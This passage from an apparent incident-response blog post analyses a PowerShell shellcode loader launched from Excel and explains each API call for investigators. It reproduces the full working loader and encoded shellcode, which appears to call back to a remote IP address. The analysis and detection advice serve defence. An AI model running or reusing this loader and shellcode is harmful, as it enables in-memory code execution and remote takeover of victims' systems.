[Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);';$qz=[Convert]::ToBase64String([Text.Encoding]::Unicode.GetBytes($is));$um="powershell";$PM="Windows";$kXt = "C:\$PM\syswow64\$PM$um\v1.0\$um";$ItX = 'Tr"+"u"+"e';if([environment]::Is64BitOperatingSystem -eq '$ItX'){$um= 
$kXt};$vF=" $um SwfX $qz";$vF=$vF.replace("SwfX", "-noexit -e");iex $vF</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">We could spend an entire post picking this apart. For our purposes and for expediency, let's call out a few things about it and move on. According to the <a href="https://twitter.com/lee_holmes" style="font-style: normal;" target="_blank">esteemable polymath Lee Holmes</a>, the proper way to attempt deobfuscation of obfuscated PowerShell is to run it in a VM with the latest PowerShell installed and all PS logging enabled, then review the logs post execution. 
The reason for this is that PowerShell has <i>side effects</i>, which is to say executing PS, even if you were to replace the </font><font face="courier">iex $vF</font><font face="inherit"> called near the end of the output above with something like </font><font face="courier">Write-Host $vF</font><font face="inherit">, could cause changes outside the scope.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">The above has already executed on our victim system and was logged in PowerShell's Operational log as a 4104 event:</span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: 
none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">$Ku='[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint amount);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao);[DllImport("msvcrt"+"."+"dll")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$TW="}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,}10,}00,}00,}68,}00,}00,}40,}00
,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,}36,}00";$Zu=Add-Type -pass -m $Ku -Name "UV" -names wXr;$Zu=$Zu.replace("wXr", "Wi"+"n"+"32Functions");[byte[]]$TW = $TW.replace("}","QhEax").replace("QhEa", "0").Split(",");$RN=0x1007;if ($TW.L -gt 0x1007){$RN=$TW.L};$dV=$Zu::calloc(0x1007, 1);[UInt64]$Tao = 0;for($vX=0;$vX -le($TW.Length-1);$vX++){$Zu::memset([IntPtr]($dV.ToInt32()+$vX), $TW[$vX], 1)};$Zu::VirtualProtect($dV, 0x1007, 0x40, [Ref]$Tao);$Zu::CreateThread(0,0x00,$dV,0,0,0);</span></p></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">This is not so different from what we saw above. This is passed as an argument to yet another PowerShell process. To recap we had Excel spawn a PowerShell building an obfuscated command line that was passed to another PowerShell, shown above once removed (white text), which spawns another PowerShell that runs the code above in black. 
If you're keeping track, it's a noisy attack.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Again a full accounting requires more work than we'll go into now, but let's spend a little time analyzing this. 
First, I find it helpful to put this into an IDE that can make sense of PowerShell and clean things up a bit.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><div style="background-color: #1e1e1e; color: #d4d4d4; font-family: menlo, monaco, "courier new", monospace; font-size: 12px; line-height: 18px; white-space: pre;"><div><span style="color: #9cdcfe;">$Ku</span>=<span style="color: #ce9178;">'[DllImport(("msvcrt"+"."+"dll"))]public static extern IntPtr calloc(uint dwSize, uint `</span></div><div><span style="color: #ce9178;"> amount)`</span></div><div><span style="color: #ce9178;">[DllImport("kernel32"+"."+"dll")]public static extern IntPtr CreateThread(IntPtr `</span></div><div><span style="color: #ce9178;"> lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, `</span></div><div><span style="color: #ce9178;"> uint dwCreationFlags, IntPtr lpThreadId)`</span></div><div><span style="color: #ce9178;">[DllImport("kernel32"+"."+"dll")]public static extern IntPtr VirtualProtect(IntPtr `</span></div><div><span style="color: #ce9178;"> lpStartAddress, uint dwSize, uint flNewProtect, out uint Tao)`</span></div><div><span style="color: #ce9178;">[DllImport("msvcrt"+"."+"dll")]public static 
extern IntPtr memset(IntPtr dest, uint src, `</span></div><div><span style="color: #ce9178;"> uint count);'</span></div><br /><div><span style="color: #9cdcfe;">$TW</span>=<span style="color: #ce9178;">"}e8,}82,}00,}00,}00,}60,}89,}e5,}31,}c0,}64,}8b,}50,}30,}8b,}52,}0c,}8b,}52,}14,}8b,`</span></div><div><span style="color: #ce9178;">}72,}28,}0f,}b7,}4a,}26,}31,}ff,}ac,}3c,}61,}7c,}02,}2c,}20,}c1,}cf,}0d,}01,}c7,}e2,}f2,`</span></div><div><span style="color: #ce9178;">}52,}57,}8b,}52,}10,}8b,}4a,}3c,}8b,}4c,}11,}78,}e3,}48,}01,}d1,}51,}8b,}59,}20,}01,}d3,`</span></div><div><span style="color: #ce9178;">}8b,}49,}18,}e3,}3a,}49,}8b,}34,}8b,}01,}d6,}31,}ff,}ac,}c1,}cf,}0d,}01,}c7,}38,}e0,}75,`</span></div><div><span style="color: #ce9178;">}f6,}03,}7d,}f8,}3b,}7d,}24,}75,}e4,}58,}8b,}58,}24,}01,}d3,}66,}8b,}0c,}4b,}8b,}58,}1c,`</span></div><div><span style="color: #ce9178;">}01,}d3,}8b,}04,}8b,}01,}d0,}89,}44,}24,}24,}5b,}5b,}61,}59,}5a,}51,}ff,}e0,}5f,}5f,}5a,`</span></div><div><span style="color: #ce9178;">}8b,}12,}eb,}8d,}5d,}68,}6e,}65,}74,}00,}68,}77,}69,}6e,}69,}54,}68,}4c,}77,}26,}07,}ff,`</span></div><div><span style="color: #ce9178;">}d5,}31,}db,}53,}53,}53,}53,}53,}68,}3a,}56,}79,}a7,}ff,}d5,}53,}53,}6a,}03,}53,}53,}6a,`</span></div><div><span style="color: #ce9178;">}50,}e8,}84,}00,}00,}00,}2f,}38,}4b,}68,}38,}39,}00,}50,}68,}57,}89,}9f,}c6,}ff,}d5,}89,`</span></div><div><span style="color: #ce9178;">}c6,}53,}68,}00,}02,}60,}84,}53,}53,}53,}57,}53,}56,}68,}eb,}55,}2e,}3b,}ff,}d5,}96,}6a,`</span></div><div><span style="color: #ce9178;">}0a,}5f,}53,}53,}53,}53,}56,}68,}2d,}06,}18,}7b,}ff,}d5,}85,}c0,}75,}16,}68,}88,}13,}00,`</span></div><div><span style="color: #ce9178;">}00,}68,}44,}f0,}35,}e0,}ff,}d5,}4f,}75,}e1,}68,}f0,}b5,}a2,}56,}ff,}d5,}6a,}40,}68,}00,`</span></div><div><span style="color: #ce9178;">}10,}00,}00,}68,}00,}00,}40,}00,}53,}68,}58,}a4,}53,}e5,}ff,}d5,}93,}53,}53,}89,}e7,}57,`</span></div><div><span style="color: 
#ce9178;">}68,}00,}20,}00,}00,}53,}56,}68,}12,}96,}89,}e2,}ff,}d5,}85,}c0,}74,}cd,}8b,}07,}01,}c3,`</span></div><div><span style="color: #ce9178;">}85,}c0,}75,}e5,}58,}c3,}5f,}e8,}7d,}ff,}ff,}ff,}31,}30,}2e,}34,}37,}2e,}34,}37,}2e,}32,`</span></div><div><span style="color: #ce9178;">}36,}00"</span></div><br /><div><span style="color: #9cdcfe;">$Zu</span>=<span style="color: #dcdcaa;">Add-Type</span> -pass -m <span style="color: #9cdcfe;">$Ku</span> -Name <span style="color: #ce9178;">"UV"</span> -names wXr</div><div><span style="color: #9cdcfe;">$Zu</span>=<span style="color: #9cdcfe;">$Zu</span><span style="color: #dcdcaa;">.replace</span>(<span style="color: #ce9178;">"wXr"</span>, <span style="color: #ce9178;">"Wi"</span>+<span style="color: #ce9178;">"n"</span>+<span style="color: #ce9178;">"32Functions"</span>)</div><br /><div>[<span style="color: #569cd6;">byte</span>[]]<span style="color: #9cdcfe;">$TW</span> = <span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.replace</span>(<span style="color: #ce9178;">"}"</span>,<span style="color: #ce9178;">"QhEax"</span>).replace(<span style="color: #ce9178;">"QhEa"</span>, <span style="color: #ce9178;">"0"</span>).Split(<span style="color: #ce9178;">","</span>)</div><br /><div><span style="color: #9cdcfe;">$RN</span>=<span style="color: #b5cea8;">0x1007</span></div><br /><div><span style="color: #c586c0;">if</span> (<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.L</span> -gt <span style="color: #b5cea8;">0x1007</span>)</div><div>{</div><div> <span style="color: #9cdcfe;">$RN</span>=<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.L</span></div><div>}</div><br /><div><span style="color: #9cdcfe;">$dV</span>=<span style="color: #9cdcfe;">$Zu</span>::calloc(<span style="color: #b5cea8;">0x1007</span>, <span style="color: #b5cea8;">1</span>)</div><div>[<span style="color: #569cd6;">UInt64</span>]<span style="color: #9cdcfe;">$Tao</span> = <span 
style="color: #b5cea8;">0</span></div><div><span style="color: #c586c0;">for</span>(<span style="color: #9cdcfe;">$vX</span>=<span style="color: #b5cea8;">0</span>; <span style="color: #9cdcfe;">$vX</span> -le(<span style="color: #9cdcfe;">$TW</span><span style="color: #dcdcaa;">.Length</span>-<span style="color: #b5cea8;">1</span>); <span style="color: #9cdcfe;">$vX</span>++)</div><div>{</div><div> <span style="color: #9cdcfe;">$Zu</span>::memset([<span style="color: #569cd6;">IntPtr</span>](<span style="color: #9cdcfe;">$dV</span><span style="color: #dcdcaa;">.ToInt32</span>()+<span style="color: #9cdcfe;">$vX</span>), <span style="color: #9cdcfe;">$TW</span>[<span style="color: #9cdcfe;">$vX</span>], <span style="color: #b5cea8;">1</span>)</div><div>}</div><br /><div><span style="color: #9cdcfe;">$Zu</span>::VirtualProtect(<span style="color: #9cdcfe;">$dV</span>, <span style="color: #b5cea8;">0x1007</span>, <span style="color: #b5cea8;">0x40</span>, [<span style="color: #569cd6;">Ref</span>]<span style="color: #9cdcfe;">$Tao</span>)</div><div><span style="color: #9cdcfe;">$Zu</span>::CreateThread(<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0x00</span>,<span style="color: #9cdcfe;">$dV</span>,<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0</span>,<span style="color: #b5cea8;">0</span>)</div></div></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; 
text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">As investigators, we'll want to glean as much as we can as quickly as we can. Several things jump out at me. First and foremost is the string of hexadecimal characters delimited by </font><font face="courier">,}</font><font face="inherit">, which is assigned to a variable named </font><font face="courier">$TW</font><font face="inherit">. I take this to be shellcode, but it requires more time and effort to grok.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">We see a variable named <font face="courier">$Ku</font> assigned a string that calls <font face="courier">DllImport</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> multiple times, referencing in order the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">calloc</font></span><span style="background-color: 
white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> function in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">msvcrt.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">, the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">CreateThread</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">VirtualProtect</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> functions in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">kernel32.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and finally the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">memset</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> function in </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">msvcrt.dll</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">.</span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-family: inherit; font-variant-ligatures: 
no-common-ligatures;"><br /></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">Below the byte array we see a variable created called </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Zu</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">. </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Zu</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> is set to the result of a call to the <a href="https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/add-type?view=powershell-7" target="_blank">Add-Type cmdlet</a>, which is going to cause some just-in-time compilation, triggering the C# compiler, </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">csc.exe</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> and the C# linker, </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">cvtres.exe</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">. This JIT compilation will add the specified functionality to our PowerShell session that wouldn't otherwise be there, essentially allowing the PowerShell session to access C# functionality it may not normally have. 
In my experience, this compilation will create a dll on disk that may be useful to analysts, though I've not personally taken the time to examine one. Passing it to <a href="https://github.com/erocarrera/pefile" target="_blank">pefile</a> may be insightful. After </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">Add-Type</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> completes, $Zu will be a </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">RuntimeType</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> object (</span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">Add-Type</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> only returns the compiled type when it is called with </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">-PassThru</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;">; otherwise it returns nothing). The value of the variable </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">$Ku</font></span><span style="background-color: white; font-family: inherit; font-variant-ligatures: no-common-ligatures;"> from above is passed in as the </span><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="courier">MemberDefinition</font><font face="inherit">, the </font><font face="courier">Name</font><font face="inherit"> of the class created will be </font><font face="courier">UV</font><font face="inherit"> and the </font><font face="courier">Namespace</font><font face="inherit"> will be </font><font face="courier">wXr</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div 
style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Immediately following the designation of </font><font face="courier">wXr</font><font face="inherit"> as the </font><font face="courier">Namespace</font><font face="inherit">, we see the </font><font face="courier">replace()</font><font face="inherit"> method called on </font><font face="courier">$Zu</font><font face="inherit">, but I think this will fail as </font><font face="courier">RuntimeType</font><font face="inherit"> objects have no </font><font face="courier">replace()</font><font face="inherit"> method.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next we have some manipulations of the </font><font face="courier">$TW</font><font face="inherit"> variable. Every curly brace is replaced by QhEax, and then QhEa is replaced by 0, so each brace becomes the 0x prefix of a hex byte literal (String.Replace, which is what PowerShell's </font><font face="courier">replace()</font><font face="inherit"> calls, rewrites every occurrence). The string is then split on the comma character, leaving </font><font face="courier">$TW</font><font face="inherit"> holding an array of hex byte values. The two-step replace exists so that neither a 0x prefix nor a recognizable byte array ever appears in the script text. Next up a variable named </font><font face="courier">$RN</font><font face="inherit"> is assigned the value 0x1007. Then </font><font face="courier">$dv</font><font face="inherit"> is assigned the return value from a call to $Zu's <a href="https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/calloc?view=vs-2019" target="_blank">calloc()</a> function: a pointer to the zero-filled block it allocated on the CRT heap. Heap memory is readable and writable but not executable, which is why </font><font face="courier">VirtualProtect()</font><font face="inherit"> shows up a few lines later.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">Next a for loop walks the </font><font face="courier">$TW</font><font face="inherit"> array, calling </font><font face="courier"><a href="https://docs.microsoft.com/en-us/cpp/c-runtime-library/reference/memset-wmemset?view=vs-2019" target="_blank">memset()</a></font><font face="inherit"> once per element to write it into the previously allocated memory (note the use of the </font><font face="courier">$dv</font><font face="inherit"> pointer as the destination), so the buffer fills one byte at a time from </font><font 
face="courier">$TW</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">After populating the allocated memory, the </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/memoryapi/nf-memoryapi-virtualprotect" target="_blank">VirtualProtect()</a></font><font face="inherit"> function is called on that buffer. Of note, the </font><font face="courier">0x40</font><font face="inherit"> value is the <a href="https://docs.microsoft.com/en-us/windows/win32/memory/memory-protection-constants" target="_blank">memory protection constant</a> PAGE_EXECUTE_READWRITE: the heap block is flipped from read/write to read/write/execute so the bytes just copied in can run. A private, non-image region that is both writable and executable is exactly what memory scanners look for, so this is a good place to hunt if you have process memory.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And finally </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createthread" target="_blank">CreateThread()</a></font><font face="inherit"> is called with </font><font face="courier">$dv</font><font face="inherit"> as the start address, so the copied bytes execute as a new thread in the current PowerShell process. Note this is not </font><font face="courier"><a href="https://docs.microsoft.com/en-us/windows/win32/api/processthreadsapi/nf-processthreadsapi-createremotethread" target="_blank">CreateRemoteThread()</a></font><font face="inherit">, which creates a new thread of execution in a remote process. We'll see the latter later. The distinction matters for detection: Sysmon logs </font><font face="courier">CreateRemoteThread()</font><font face="inherit"> as Event ID 8, but an in-process </font><font face="courier">CreateThread()</font><font face="inherit"> produces no Sysmon event at all, so for this stage the process creation chain and the command lines are the evidence.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">So we have a rough outline of what this is doing, but we won't know the details unless we pick apart the byte array. If anyone wants to chime in on a reasonable process for that, 